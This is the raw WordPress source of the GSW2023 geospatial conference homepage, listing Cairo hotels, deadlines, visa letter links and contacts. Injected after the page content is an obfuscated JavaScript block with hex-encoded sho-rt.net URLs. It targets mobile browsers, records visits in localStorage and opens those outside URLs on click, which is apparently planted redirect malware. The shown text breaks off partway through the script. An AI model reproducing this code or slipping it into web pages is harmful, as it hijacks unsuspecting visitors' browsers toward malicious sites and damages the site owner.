css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687389797868{margin-top: 10px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687389578407{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" width=\"281\" height=\"187\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const 